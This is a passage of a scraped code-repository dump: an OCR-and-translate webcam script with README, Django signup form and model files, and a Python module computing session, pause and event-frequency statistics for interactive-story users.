in image_data:\n output_data = {}\n output_data['cooridnates'], output_data['text'], output_data['confidence'] = datum\n output_data['confidence'] = str(output_data['confidence']) \n output_array.append(output_data)\n \n output = {'data': output_array}\n return output\n\nif __name__ == '__main__':\n app.run(debug=True)" }, { "alpha_fraction": 0.6982758641242981, "alphanum_fraction": 0.6982758641242981, "avg_line_length": 16.769229888916016, "blob_id": "a618ba0d53572030ced86ec36180045c718346bc", "content_id": "c012a0e76948c1cdb46e642b48a10b5e9cedc47d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 232, "license_type": "no_license", "max_line_length": 113, "num_lines": 13, "path": "/README.md", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "# How to use \n\n* Install dependencies:\n\n```\npip install opencv-python easyocr\n``` \n\n* Run the code (please mind that you need a webcam or you can use your phone with Iriun or DroidCam as an input.)\n\n```\npython ocr_translate.py\n``` \n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6031249761581421, "avg_line_length": 26.05084800720215, "blob_id": "bd95f98e5964af57ad84e6caa0efc2553eb70a28", "content_id": "af9f1c7c53f76985c40f2c9c819b20d48f4628f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1600, "license_type": "no_license", "max_line_length": 71, "num_lines": 59, "path": "/ocr_translate.py", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "\"\"\" Main code \"\"\" \n\nimport cv2 \nimport easyocr \nimport googletrans\nimport time \n\ndef read_image_data(image, text_reader):\n image_data = reader.readtext(image, workers=1)\n texts = []\n for datum in image_data:\n coordinates, text, confidence = datum \n texts.append(text)\n top_left = (int(coordinates[0][0]), int(coordinates[0][1]))\n bottom_right = (int(coordinates[2][0]), int(coordinates[2][1]))\n cv2.rectangle(image, top_left, bottom_right, (0, 255, 0), 5) \n \n return texts\n\ndef camera_data(camera):\n 
while True:\n _, image = camera.read()\n cv2.imshow('Camera', image)\n exit = cv2.waitKey(30) & 0xff\n if exit == 32:\n cv2.imwrite(file_name, image)\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\ndef translation(texts):\n translator = googletrans.Translator()\n for text in texts:\n translation = translator.translate(text, dest=\"fa\")\n print(f'{text} : {translation.text}')\n\nif __name__ == '__main__':\n \"\"\" Global Variables \"\"\"\n camera = cv2.VideoCapture(0) \n reader = easyocr.Reader(['en'], gpu=False)\n file_name = 'photo_taken.jpg'\n fps = camera.get(cv2.CAP_PROP_FPS)\n fps = int(fps) + 1\n print(f'FPS : {fps}')\n\n camera_data(camera=camera)\n time.sleep(5)\n\n image_to_recognize = cv2.imread(file_name)\n text_data = read_image_data(image_to_recognize, reader)\n\n translation(text_data)\n\n cv2.imshow('Result', image_to_recognize)\n \n exit_key = cv2.waitKey(0) & 0xff\n if exit_key == ord('q'):\n cv2.destroyAllWindows()\n " } ]
3
zogbr/django-deployment-example
https://github.com/zogbr/django-deployment-example
4b5e97855b7fbeb861d1f1dceb47468a2d531e6f
9d05059456e1e64d3cbf452c577651703e17e9a2
29049bc1e693c8070a1898100a90ddd226d7b48a
refs/heads/main
2023-03-03T19:17:46.919334
2021-02-15T09:46:19
2021-02-15T09:46:19
339,010,138
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7221750020980835, "alphanum_fraction": 0.7451146841049194, "avg_line_length": 64.22222137451172, "blob_id": "13a3df5261f9bfff308940f479935499e2359dc6", "content_id": "58b3d822f4190a9a237139111987c6af29422ac7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 104, "num_lines": 18, "path": "/my_site/authenticate/forms.py", "repo_name": "zogbr/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nclass SignUpForm(UserCreationForm):\n\tusername = forms.CharField(max_length=150, widget=forms.TextInput(attrs={'class':'form-control'}))\n\temail = forms.EmailField(widget=forms.EmailInput(attrs={'class':'form-control'}))\n\tfirst_name = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tlast_name = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tuser_function = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tphone1 = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tphone2 = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tpassword = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tpassword1 = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('username', 'first_name', 'last_name', 'email', 'user_function', 'phone1', 'phone2',)\n\t\t\t" }, { "alpha_fraction": 0.6919831037521362, "alphanum_fraction": 0.7236286997795105, "avg_line_length": 32.92856979370117, "blob_id": "42a58392a2060af6be05ca0e9c4735d551f7ee6d", "content_id": "0b5393ef4b3a1468ca7eeaeb746f89f6cc81db1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 109, "num_lines": 14, "path": "/my_site/authenticate/models.py", "repo_name": "zogbr/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass User(User):\n\ttitle = forms.CharField(max_length=30)\n\tspeciality = forms.CharField(max_length=255)\n\tphone1 = forms.CharField(max_length=30)\n\tphone2 = forms.CharField(max_length=30)\n\tphonemobile = forms.CharField(max_length=30)\n\tcity = forms.CharField(max_length=50)\n\n\tclass Meta(object):\n\t\tmodel = User\n\t\tfields('username', 'first_name', 'last_name', 'email', 'password', 'groups', 'is_active', 'is_superuser', )" } ]
2
JonoCX/interaction-lib
https://github.com/JonoCX/interaction-lib
ed7b6ee4dd4e885aae5429047fdbe2ff325e45fd
a0b64183c943eb5857b10106198e185c256939fa
13914bacf709dc7740f50a2b18a59f2149857fea
refs/heads/master
2023-04-14T23:01:50.675501
2022-01-19T15:14:22
2022-01-19T15:14:22
255,882,623
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5252060294151306, "alphanum_fraction": 0.5286529660224915, "avg_line_length": 44.67404556274414, "blob_id": "046ed08ec3868886bbc8521aa1726b4c6e429842", "content_id": "2db3b69601f7ae3b0fdcf5ac9cc04817a26a9943", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37134, "license_type": "no_license", "max_line_length": 107, "num_lines": 813, "path": "/interlib/preprocessing/statistics.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \"\"\"\n\nfrom numpy.core.multiarray import result_type\nfrom .base import BaseExtractor\nfrom ..util import get_hidden_time, missing_hidden_visibility_change, safe_division\n\nfrom joblib import Parallel, delayed, cpu_count\nfrom datetime import datetime as dt\nfrom collections import Counter, defaultdict\nfrom typing import Optional, Union, List, Set, Dict\n\nimport numpy as np \nimport pandas as pd \n\nnp.random.seed(42)\n\nNEC = 'NARRATIVE_ELEMENT_CHANGE'\nBVC = 'BROWSER_VISIBILITY_CHANGE'\n\nclass Statistics(BaseExtractor):\n \n def __init__(\n self, \n user_event_dict: Dict[str, List[Dict]], \n completion_point: Optional[str] = None,\n n_jobs: Optional[int] = 1,\n narrative_element_durations: Optional[Dict[str, float]] = None\n ) -> None: \n BaseExtractor.__init__(\n self,\n user_event_dict = user_event_dict.copy(),\n completion_point = completion_point,\n n_jobs = n_jobs,\n )\n\n self._statistics = {}\n self._time_statistics = {}\n self._pause_statistics = {}\n self._event_statistics = {}\n self._user_event_frequencies = {}\n self._nec_durations = narrative_element_durations\n\n def time_statistics(\n self, \n verbose: Optional[int] = 0, \n user_id: Optional[str] = None\n ) -> Dict:\n \"\"\" \n Using the user event data, calculate the hidden time, raw\n session length, and session length of the users.\n\n :params verbose: passed to the joblib backend\n :params user_id: a specific user to get the statistics for\n :returns: dictionary of results {user -> {hidden_time: 0...}}\n \"\"\"\n def _get_timings(events):\n times = defaultdict(float) # {<nec_name>: <time spent>}\n for idx, event in enumerate(events):\n if event == events[-1]: break \n\n if event['action_name'] == NEC:\n # search forward to gather all events between this NEC and the next\n intermediate_events = []\n for ev in events[idx + 1:]:\n intermediate_events.append(ev)\n\n # exit once we've found the next NEC\n if ev['action_name'] == NEC: break\n\n # if there's only one - i.e. 
the next NEC was immediately following\n if (len(intermediate_events) == 1 and \n intermediate_events[0]['action_name'] == NEC): \n time_diff = ( # get the time difference in seconds\n intermediate_events[0]['timestamp'] - event['timestamp']\n ).total_seconds()\n else: # then we have some additional (BVC) events in between\n non_nec_events = [ # get all of those non-NEC events\n ev for ev in intermediate_events if ev['action_name'] != NEC\n ]\n hidden_times = []\n for non_nec_idx, non_nec_ev in enumerate(non_nec_events):\n hidden_times.append(get_hidden_time(\n non_nec_ev['timestamp'], non_nec_idx, non_nec_events\n ))\n\n time_diff = ( # get the time difference\n intermediate_events[-1]['timestamp'] - event['timestamp']\n ).total_seconds() - sum(hidden_times)\n\n times[event['data']['romper_to_state']] += time_diff # times.append(time_diff)\n return times \n\n def _get_normalised_nec_time(user_timings):\n times = []\n \n for nec, time in user_timings.items():\n if nec not in self._nec_durations.keys():\n continue \n\n if self._nec_durations[nec] == 0:\n times.append(0.0)\n else:\n default_duration = self._nec_durations[nec]\n times.append(safe_division(time, default_duration))\n\n return {\n 'norm_avg_nec_time': np.mean(times),\n 'norm_std_nec_time': np.std(times)\n }\n\n def _get_average_nec_time(user_dict, no_event_set = None):\n result = {}\n\n for user, events in user_dict.items():\n if user in no_event_set:\n result[user] = {\n 'avg_nec_time': 0.0, 'std_nec_time': 0.0, 'med_nec_time': 0.0\n }\n continue\n\n nec_bvc_events = [ # get the BVC and NEC events\n ev \n for ev in events \n if (ev['action_name'] == 'BROWSER_VISIBILITY_CHANGE' or \n ev['action_name'] == 'NARRATIVE_ELEMENT_CHANGE')\n ]\n\n times = _get_timings(nec_bvc_events)\n times_arr = [t for t in times.values()]\n\n if self._nec_durations:\n norm_times = _get_normalised_nec_time(times)\n result[user] = {\n 'avg_nec_time': np.mean(times_arr),\n 'std_nec_time': np.std(times_arr),\n 'med_nec_time': np.median(times_arr),\n 'norm_avg_nec_time': norm_times['norm_avg_nec_time'],\n 'norm_std_nec_time': norm_times['norm_std_nec_time']\n }\n else:\n result[user] = {\n 'avg_nec_time': np.mean(times_arr),\n 'std_nec_time': np.std(times_arr),\n 'med_nec_time': np.median(times_arr)\n }\n\n return result\n \n def _get_stats(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n timestamps = {}\n no_events_set = set([])\n # calculate the hidden time (and get the timestamps)\n for user, events in user_dict.items():\n if len(events) < 1: # if there are no events\n no_events_set.add(user) # essentially set a flag per user\n \n # set hidden time/raw to 0.0\n results[user].update({'hidden_time': 0.0, 'raw_session_length': 0.0}) \n continue # move onto the next user\n\n timestamps[user] = [event['timestamp'] for event in events] # collect timestamps\n\n hidden_times = []\n hidden_time_completion_point = None \n timestamp_reached_completion_point = None\n # for all events, if there is a visibility change to hidden\n for index, event in enumerate(events): \n if (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n event['data']['romper_to_state'] == 'hidden'):\n hidden_times.append(\n get_hidden_time(\n event['timestamp'],\n index,\n events\n )\n )\n\n # time of completion\n if self.completion_point:\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == self.completion_point and\n 
                            self._users_reached_completion_point[user]):\n                            hidden_time_completion_point = np.sum(hidden_times)\n                            timestamp_reached_completion_point = event['timestamp']\n\n                # record the sum of the hidden times\n                results[user].update({'hidden_time': np.sum(hidden_times)})\n\n                # time to completion statistics\n                if self.completion_point:\n                    if not self._users_reached_completion_point[user]:\n                        results[user].update({'time_to_completion': 0.0})\n                    else:\n                        # have to take into account the hidden time.\n                        raw_time = (\n                            timestamp_reached_completion_point - timestamps[user][0]\n                        ).total_seconds()\n                        results[user].update({\n                            'time_to_completion': raw_time - hidden_time_completion_point\n                        })\n                # add in whether the user reached the end\n                results[user].update({\n                    'reach_end': self._users_reached_completion_point[user],\n                    'last_ne_seen': self.last_ne[user]\n                })\n\n            # calculate the raw session length\n            for user, ts in timestamps.items():\n                results[user].update({'raw_session_length': (ts[-1] - ts[0]).total_seconds()})\n\n            # calculate the average (plus other statistics) NEC time\n            avg_nec_times = _get_average_nec_time(user_dict, no_events_set)\n            if self._nec_durations:\n                for user, res in avg_nec_times.items():\n                    results[user].update({\n                        'avg_nec_time': res['avg_nec_time'],\n                        'std_nec_time': res['std_nec_time'],\n                        'med_nec_time': res['med_nec_time'],\n                        'norm_avg_nec_time': res['norm_avg_nec_time'],\n                        'norm_std_nec_time': res['norm_std_nec_time']\n                    }) \n            else:\n                for user, res in avg_nec_times.items():\n                    results[user].update({\n                        'avg_nec_time': res['avg_nec_time'],\n                        'std_nec_time': res['std_nec_time'],\n                        'med_nec_time': res['med_nec_time']\n                    })\n\n            for user, res in results.copy().items(): # update the results with the session length\n                if user in no_events_set: sess_length = 0.0\n                else: sess_length = res['raw_session_length'] - res['hidden_time']\n                results[user].update({'session_length': sess_length})\n\n            return results\n\n        if not self._time_statistics: # we've not already calculated\n            if user_id is not None: # if the user is wanting a specific user\n                if not isinstance(user_id, str):\n                    raise TypeError('User ID should be a string: {0}'.format(user_id))\n\n                if user_id not in self.data.keys():\n                    raise ValueError('Invalid User ID: {0}'.format(user_id))\n\n                # calculate the statistics for that user\n                return _get_stats(user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n            self._time_statistics = {user: {} for user, d in self.data.items()}\n            parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n            # run the process to calculate the statistics\n            res = parallel(delayed(_get_stats) (u, e) for u, e in self._users_split)\n\n            # unpack the results into the time statistics dictionary\n            for r in res:\n                for u, s in r.items():\n                    self._time_statistics[u].update(s)\n\n            return self._time_statistics\n        else: # otherwise just return the pre-calculated statistics\n            if user_id is not None: # if the user is wanting a specific user\n                if not isinstance(user_id, str):\n                    raise TypeError('User ID should be a string: {0}'.format(user_id))\n\n                if user_id not in self._time_statistics.keys() or user_id not in self.data.keys():\n                    raise ValueError('Invalid User ID: {0}'.format(user_id))\n\n                # retrieve the statistics for that user.\n                return self._time_statistics[user_id]\n            return self._time_statistics\n\n    def session_length(\n        self, \n        user_id: Optional[str] = None, \n        verbose: Optional[int] = 0\n    ) -> Dict:\n        \"\"\" \n        Calculate the session length only.\n\n        :params user_id: specify a user, default is to calculate\n            for all users\n        
:params verbose: verbosity passed to the joblib backend \n :returns: the session length or \n all session lengths as dictionary {user -> session length}\n \"\"\"\n if self._time_statistics: # if the statistics have already been written\n if user_id: # if the request is for a single user\n if user_id not in self._time_statistics.keys(): \n raise ValueError('Invalid user id (perhaps the user is not in the data)')\n\n return self._time_statistics[user_id]['session_length']\n return {user: stat['session_length'] for user, stat in self._time_statistics.items()}\n else:\n self.time_statistics(verbose = verbose)\n\n if user_id:\n if user_id not in self._time_statistics.keys():\n raise ValueError('Invalid user id (perhaps the user is not in the data)')\n return self._time_statistics[user_id]['session_length']\n \n return {user: stat['session_length'] for user, stat in self._time_statistics.items()}\n\n def _pause_counts(\n self, \n events: list,\n pauses_include_events: Optional[Set] = {},\n pauses_exclude_events: Optional[Set] = {}, \n ) -> Dict[str, int]:\n \"\"\"\n Given a set of user actions, count the number of\n pauses that occur.\n\n :params events: the user events\n :params pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n \"\"\"\n pauses = []\n previous_timestamp = events[0]['timestamp']\n for event in events:\n # if the event is a user action OR in the events we want to include AND not in the\n # events we want to exclude, then calculate the pauses\n if ((event['action_type'] == 'USER_ACTION' or \n event['action_name'] in pauses_include_events) and \n event['action_name'] not in pauses_exclude_events): \n\n pause_type, diff = self._type_of_pause(previous_timestamp, event['timestamp'])\n\n # if there is a pause of some description, then add to the list\n if pause_type != 0: \n pauses.append(pause_type)\n\n # set the previous timestamp to the current\n previous_timestamp = event['timestamp']\n\n \n pauses = Counter(pauses)\n return {\n 'SP': pauses['SP'], 'MP': pauses['MP'], 'LP': pauses['LP'], 'VLP': pauses['VLP']\n }\n \n def pause_statistics(\n self, \n verbose: Optional[int] = 0, \n user_id: Optional[str] = None,\n pauses_include_events: Optional[Set] = {},\n pauses_exclude_events: Optional[Set] = {} \n ) -> Dict[str, Dict]:\n \"\"\" \n Based on the event data supplied, calculate the pause\n statistics for each of the users.\n\n :params verbose: verbosity level passed to the joblib backend\n :params user_id: a specific user to calculate the statistics for\n :params pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n :returns: a dictionary with a mapping from user to statistics\n \"\"\"\n def _get_pauses(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n for user, events in user_dict.items():\n if len(events) < 1: # if the user has no events\n results[user].update({'SP': 0, 'MP': 0, 'LP': 0, 'VLP': 0})\n continue\n\n results[user].update(\n self._pause_counts(\n events, \n pauses_include_events = pauses_include_events,\n pauses_exclude_events = pauses_exclude_events\n )\n )\n \n 
return results\n\n # if the statistics haven't been previously calculated\n if not self._pause_statistics:\n if user_id is not None: # if the user is asking for the stats of a specific user\n if not isinstance(user_id, str):\n raise TypeError('User Id should be a string: {0}'.format(user_id))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid user id: {0}'.format(user_id))\n \n # calculate the pause statistics for that individual (non-parallel)\n return _get_pauses(user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n self._pause_statistics = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the pause statistics job in parallel\n res = parallel(delayed(_get_pauses) (u, e) for u, e in self._split_users())\n\n # unpack the results and add to the pause statistics dictionary\n for r in res:\n for u, p in r.items():\n self._pause_statistics[u].update(p)\n\n return self._pause_statistics\n else:\n if user_id is not None:\n if not isinstance(user_id, str):\n raise TypeError('User Id should be a string: {0}'.format(user_id))\n\n if user_id not in self._pause_statistics.keys() or user_id not in self.data.keys():\n raise ValueError('Invalid user id: {0}'.format(user_id))\n\n return self._pause_statistics[user_id]\n return self._pause_statistics\n\n def event_statistics(\n self,\n interaction_events: Set[str],\n include_link_choices: Optional[bool] = False,\n include_user_set_variables: Optional[bool] = False,\n verbose: Optional[int] = 0,\n user_id: Optional[str] = None\n ) -> Dict[str, Dict[str, int]]:\n \"\"\" \n \n :params interaction_events: all of the events that should be counted\n :params include_link_choices: whether to include LC in the total count\n :params include_user_set_variable: whether to include USV in the total count\n :params verbose: the level of output passed to the joblib backend\n :params user_id: the specific user to fetch statistics on\n :returns: event-based statistics (dictionary)\n \"\"\"\n def _event_stats(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n for user, events in user_dict.items():\n if len(events) < 1: # if the user has no events\n results[user].update({ev: 0 for ev in interaction_events})\n continue\n\n ua_counter = defaultdict(int) # counter for all events\n\n # set the default for each of the events\n for event in interaction_events: ua_counter[event] = 0\n\n for event in events:\n if event['action_name'] in interaction_events:\n ua_counter[event['action_name']] += 1\n \n # subtract one from PLAY_PAUSE, there's always one at the beginning and\n # only if the value is not 0\n if ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] != 0:\n ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] -= 1\n\n # calculate the total number of events\n total_events = sum(ua_counter.values())\n\n if not include_link_choices:\n total_events -= ua_counter['LINK_CHOICE_CLICKED']\n \n if not include_user_set_variables:\n total_events -= ua_counter['USER_SET_VARIABLE']\n\n # calculate relative frequency for each event\n user_actions_proportion = defaultdict(float)\n for event, count in ua_counter.items():\n user_actions_proportion[event + '_proportion'] = safe_division(\n count, total_events) / 100\n\n results[user].update(dict(ua_counter))\n results[user].update(dict(user_actions_proportion))\n results[user].update({'total_events': total_events})\n \n return results \n\n # 
check that the interaction events is a set\n if not isinstance(interaction_events, set):\n raise TypeError(\n 'Interaction events should be a set of actions: {0}'.format(interaction_events))\n \n # check that the interaction events set contains something\n if len(interaction_events) == 0:\n raise ValueError('Interaction events cannot be empty: {0}'.format(interaction_events))\n\n if not self._event_statistics:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0}'.format(user_id))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n # calculate the event statistics for that user\n return _event_stats(\n user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n \n self._event_statistics = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the event extract in parallel\n results = parallel(delayed(_event_stats) (u, e) for u, e in self._split_users())\n\n # unpack the results and add to the event statistics dictionary\n for res in results:\n for user, event_stats in res.items():\n self._event_statistics[user].update(event_stats)\n\n return self._event_statistics\n else:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0}'.format(user_id))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n return self._event_statistics[user_id]\n return self._event_statistics\n\n def event_frequencies(\n self, \n frequencies: List[Union[int, float]],\n interaction_events: List[str], \n user_id: Optional[str] = None, \n include_pauses: Optional[bool] = False,\n verbose: Optional[int] = 0\n ) -> Dict[str, Dict[str, Dict[str, int]]]:\n \"\"\" \n From a list of events and give a set of time thresholds,\n calculate the frequency that events happen in those periods.\n \n :params frequencies: a list of seconds as integers that you want\n to capture event frequencies for, e.g. 
[0, 60, 120, 180] would indicate that\n            you want event frequencies for minutes 0 to 1, 1 to 2, and 2 to 3.\n        :params interaction_events: a set of events that you want to capture\n            frequencies for.\n        :params user_id: a specific user to capture event frequencies for.\n        :params verbose: the amount of std out (passed to joblib backend)\n        :returns: a dictionary mapping users to an inner dictionary containing\n            a mapping of time thresholds and the count of the interaction_events\n            in that time threshold\n        \"\"\"\n        def _subset(min_threshold, max_threshold, events, previous_subset_ids):\n            events_subset = []\n            elapsed_time = 0\n            events_beyond_max_frequency = False\n\n            previous_ts = None\n            seen_hidden = False\n            missing_visibility_change = False\n            for idx, event in enumerate(events):\n                # if it's the first loop, previous ts will be none\n                if idx == 0: previous_ts = event['timestamp']\n\n                hidden = 0 # record amount of time hidden, to subtract later\n                if (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and\n                    event['data']['romper_to_state'] == 'hidden'):\n                    hidden_ts = event['timestamp']\n\n                    hidden = get_hidden_time(hidden_ts, idx, events)\n                    seen_hidden = True\n                elif (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n                    event['data']['romper_to_state'] == 'visible' and\n                    not seen_hidden):\n                    visible_ts = event['timestamp']\n\n                    # find the missing hidden visibility change\n                    hidden = missing_hidden_visibility_change(visible_ts, idx, events)\n                    seen_hidden = False # ensure that this is false\n\n                    # flag that this data quirk has happened\n                    missing_visibility_change = True \n\n                # update the elapsed time and subtract any hidden time\n                elapsed_time += (event['timestamp'] - previous_ts).total_seconds()\n                elapsed_time -= hidden\n\n                between_threshold = min_threshold <= elapsed_time < max_threshold\n\n                # if the elapsed time is between the min and max threshold\n                if (between_threshold and event['id'] not in previous_subset_ids):\n                    events_subset.append(event)\n                # else if the value isn't between the threshold, the data quirk happened\n                # and the event hasn't been previously seen\n                elif (not between_threshold and missing_visibility_change and \n                    event['id'] not in previous_subset_ids):\n                    events_subset.append(event)\n                    missing_visibility_change = False\n\n                previous_ts = event['timestamp']\n\n            # condition two: check if the user has events beyond the maximum threshold\n            if elapsed_time < max_threshold:\n                events_beyond_max_frequency = True\n\n            return events_subset, events_beyond_max_frequency\n\n        def _get_frequencies(user_chunk, data_chunk):\n            user_dict = {user: [] for user in user_chunk}\n            for d in data_chunk: user_dict[d['user']].append(d)\n\n            results = {user: {} for user in user_chunk}\n\n            for user, events in user_dict.items():\n                if len(events) < 1: # the user has no events\n                    continue\n\n                subset_ids = set([])\n                for idx, i in enumerate(range(len(frequencies) - 1)):\n                    event_subset, events_beyond_max_freq = _subset(\n                        frequencies[i], frequencies[i + 1], events,\n                        previous_subset_ids = subset_ids\n                    )\n\n                    # ids in subset\n                    subset_ids.update([ev['id'] for ev in event_subset])\n\n                    \"\"\" \n                    Two exit conditions:\n                        1) the user has no events left\n                        2) they have events but are beyond the current\n                        max frequency. 
\n                    \"\"\"\n                    # if the length is zero and there's no events beyond the current\n                    # max frequency (frequencies[i + 1])\n                    if (len(event_subset) == 0 and not events_beyond_max_freq):\n                        break # there's no more events\n\n                    ua_counter = defaultdict(int) # counter for all events\n\n                    # set the default for each of the events\n                    for event in interaction_events: ua_counter[event] = 0\n\n                    for event in event_subset: # ignoring segmentCompletion events\n                        if event['action_type'] == 'segmentCompletion': continue\n                        if event['action_name'] in interaction_events:\n                            ua_counter[event['action_name']] += 1\n\n                    # if pauses need to be included\n                    if include_pauses:\n                        for pause in ['SP', 'MP', 'LP', 'VLP']:\n                            ua_counter[pause] = 0\n\n                        for pause, count in self._pause_counts(event_subset).items():\n                            ua_counter[pause] = count\n\n                    # need to drop the first play pause, it always happens at the start\n                    if idx == 0 and ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] != 0:\n                        ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] -= 1\n\n                    results[user][str(frequencies[i]) + '_' + str(frequencies[i + 1])] = dict(ua_counter)\n\n            return results\n\n        if not isinstance(frequencies, list):\n            raise TypeError('Event frequencies should be a list of second intervals: {0} ({1})'\n                .format(\n                    frequencies, type(frequencies) \n                )\n            )\n\n        if len(frequencies) == 0:\n            raise ValueError('Event frequencies cannot be an empty list: {0}'.format(frequencies))\n\n        if not all(isinstance(x, (int, float)) for x in frequencies):\n            raise TypeError('Contents of event frequencies are not ints or floats.')\n\n        if not self._user_event_frequencies:\n            if user_id is not None: # if a specific user is requested\n                if not isinstance(user_id, str):\n                    raise TypeError('User ID should be a string: {0} ({1})'.format(\n                        user_id, type(user_id)))\n\n                if user_id not in self.data.keys():\n                    raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n                return _get_frequencies(\n                    user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n            self._user_event_frequencies = {user: {} for user, d in self.data.items()}\n            parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n            # run the event frequencies in parallel\n            results = parallel(delayed(_get_frequencies) (u, e) for u, e in self._split_users())\n\n            # unpack the results and add the frequencies into the dictionary\n            for res in results:\n                for user, event_freq in res.items():\n                    self._user_event_frequencies[user].update(event_freq)\n\n            return self._user_event_frequencies \n        else:\n            if user_id is not None: # if a specific user is requested\n                if not isinstance(user_id, str):\n                    raise TypeError('User ID should be a string: {0} ({1})'.format(\n                        user_id, type(user_id)))\n\n                if user_id not in self.data.keys():\n                    raise ValueError('Invalid User ID: {0}'.format(user_id))\n\n                return self._user_event_frequencies[user_id]\n            return self._user_event_frequencies\n\n    def calculate_statistics(\n        self, \n        interaction_events: Set[str],\n        user_id: Optional[str] = None,\n        include_link_choices: Optional[bool] = False,\n        pauses_include_events: Optional[Set] = {},\n        pauses_exclude_events: Optional[Set] = {},\n        include_user_set_variables: Optional[bool] = False,\n        verbose: Optional[int] = 0\n    ) -> Dict[str, Dict[str, Union[int, float]]]:\n        \"\"\" \n        The main function for calculating all statistics, excluding the \n        event frequencies.\n\n        :params interaction_events: a set of events that you want to\n            track in the statistics\n        :params user_id: a specific user to calculate statistics for\n        :params include_link_choices: whether to include LC in the statistics\n        :params 
pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n :params include_user_set_variables: whether to include USV in the statistics\n :params verbose: verbosity level passed to joblib backend\n :returns: a dictionary containing a mapping from users to their\n respective statistics.\n \"\"\"\n\n # check that the interaction events is a set\n if not isinstance(interaction_events, set):\n raise TypeError('Interaction events should be a set of actions: {0} ({1})'.format(\n interaction_events, type(interaction_events))\n )\n\n if len(interaction_events) == 0:\n raise ValueError('Interaction events cannot be empty: {0}'.format(interaction_events))\n\n # test that the values in a set are of type string, the process won't work with int/float\n if not all(isinstance(x, str) for x in interaction_events):\n raise TypeError('Contents of interaction_events is not string')\n \n if not self._statistics: # haven't been previously calculated\n if user_id is not None: # if statistics for a single user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0} ({1})'.format(user_id, type(user_id)))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0} ({1})'.format(user_id, type(user_id)))\n\n # return a dict of results = {total_events: 24, pp: 1, etc..}\n individual_results = {\n **self.time_statistics(user_id = user_id, verbose = verbose),\n **self.pause_statistics(\n user_id = user_id, \n pauses_include_events = pauses_include_events,\n pauses_exclude_events = pauses_exclude_events, \n verbose = verbose\n ),\n **self.event_statistics(\n interaction_events, user_id = user_id,\n include_link_choices = include_link_choices,\n include_user_set_variables = include_user_set_variables, \n verbose = verbose\n )\n }\n \n return individual_results\n\n # ---- The below may not be the most optimal approach -----\n\n # first calculate all of the statistics individually\n self.time_statistics(verbose = verbose)\n self.pause_statistics(\n pauses_include_events = 